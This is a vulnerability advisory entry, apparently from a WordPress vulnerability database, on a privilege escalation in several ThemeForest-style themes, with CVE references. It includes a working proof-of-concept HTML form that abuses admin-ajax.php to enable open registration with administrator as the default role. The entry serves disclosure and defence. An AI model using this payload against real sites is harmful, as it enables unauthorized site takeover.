Multiple Themes - Privilige Escalation



Description
The themes suffer from a privilege escalation vulnerability, any authenticated user can trigger this vulnerability due to weak permissions checking. 

An attacker can update options, such as changing user's default role, registration state and others, which may lead to executing commands/code on the server and taking over the website.

Tested Versions:

Simpolio 1.3.2
Pont 1.5
Teardrop 1.8.1
Vernissage 1.2.8
Proof of Concept
<form action="http://example.com/wp-admin/admin-ajax.php?action=of_ajax_post_action" method="post" >
	<input name="type" value="save" type="hidden" />
	<input name="data[users_can_register]" value="1" type="hidden" />
	<input name="data[default_role]" value="administrator" type="hidden" />
	<input type="submit" >
</form>

Affects Themes

References

CVE 2015-9477
CVE 2015-9476
CVE 2015-9475
CVE 2015-9474
URL https://web.archive.org/web/20150914160724/https://research.evex.pw/?vuln=17
URL https://themeforest.net/item/vernissage-responsive-photographyportfolio-theme/4436204

Classification

Type BYPASS

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 9101
Verified No
WPVDB ID 8061

Timeline

Publicly Published 2015-06-26 (over 4 years ago)
Added 2015-06-26 (over 4 years ago)
Last Updated 2019-10-31 (13 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin